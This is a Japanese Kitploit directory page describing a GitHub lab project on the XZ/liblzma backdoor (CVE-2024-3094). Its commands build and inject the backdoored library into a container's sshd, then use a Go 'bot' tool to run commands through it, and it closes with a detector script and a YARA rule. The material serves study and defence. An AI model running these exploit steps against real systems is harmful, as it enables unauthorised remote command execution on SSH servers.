Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2024-3094 — XZバックドアの脆弱性を詳細に解説 | Kitploit
ツール/GitHubGitHub/valeriot30/cve-2024-3094
脆弱性分析エクスプロイトマルウェア分析バイナリ解析学習と教育ラボと実践
GitHubvaleriot30/cve-2024-3094

cve-2024-3094

XZバックドアの脆弱性を詳細に解説

リポジトリを見る
1131年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🛡️ サイバーセキュリティプロジェクト: liblzma における XZ バックドアの解析

📄 概要

このプロジェクトは、xz-utils (liblzma) で発見された注目度の高いバックドアを解析します。影響を受けるバージョンは 5.6.0 と 5.6.1 です。アップストリームのビルドシステムに導入された悪意のあるコードは、実行時に sshd が LZMA 圧縮ライブラリと相互作用する方法を変更することで、SSH 認証を標的にしていました。

⚠️ このプロジェクトは教育および防御研究のみを目的としています。

脆弱なマシン

このリポジトリをクローンします

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

ディレクトリに移動します

root@kitploit:~
cd cve-2024-3094

Docker コンテナを起動します

root@kitploit:~
docker build -t fedora-dev .
docker run --privileged -it --rm -p 2222:22 fedora-dev

悪意のあるバージョンのライブラリを取得します

root@kitploit:~
cd ~  
git clone https://github.com/thesamesam/xz-archive.git  
cd xz-archive/5.6/ # The vulnerable version ( it works as well with 5.6.1 )  
tar xzf xz-5.6.0.tar.gz  
mv xz-5.6.0 ~

ビルドターゲットをエクスポートします

root@kitploit:~
export RPM_ARCH=$(uname -m)

悪意のあるライブラリをコンパイルします

root@kitploit:~
cd ~
 cd ./xz-5.6.0/  
./configure
make -j 8

悪意のある SO を外部にコピーします:

root@kitploit:~
cp ./src/liblzma/.libs/liblzma.so.5.6.0 ~

コンテナ内でリポジトリを再度クローンします

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

カスタムキーで liblzma ライブラリにパッチを適用します

root@kitploit:~
 python3 cve-2024-3094/patch.py liblzma.so.5.6.0

悪意のあるライブラリをシステムにリンクします

root@kitploit:~
 sh cve-2024-3094/inject.sh

悪意のあるライブラリにリンクされた sshd を実行します

root@kitploit:~
 env -i LANG=C /usr/sbin/sshd -D &

攻撃者マシン

このリポジトリをクローンします

root@kitploit:~
git clone https://github.com/valeriot30/cve-2024-3094

ディレクトリに移動します

root@kitploit:~
cd cve-2024-3094

GO ツールをコンパイルします

root@kitploit:~
go build

脆弱なマシンの IP アドレスと実行するコマンドを指定してツールを使用します

root@kitploit:~
./bot -addr 127.0.0.2:2222 -cmd 'sleep 60'

対策

検出器を使用する

検出器を実行します

root@kitploit:~
sh detector.sh

Yara を使用する

yara マッチングルールを使用します

root@kitploit:~
yara rule.yar ../liblzma.so.5.6.0 -s
ツールをダウンロード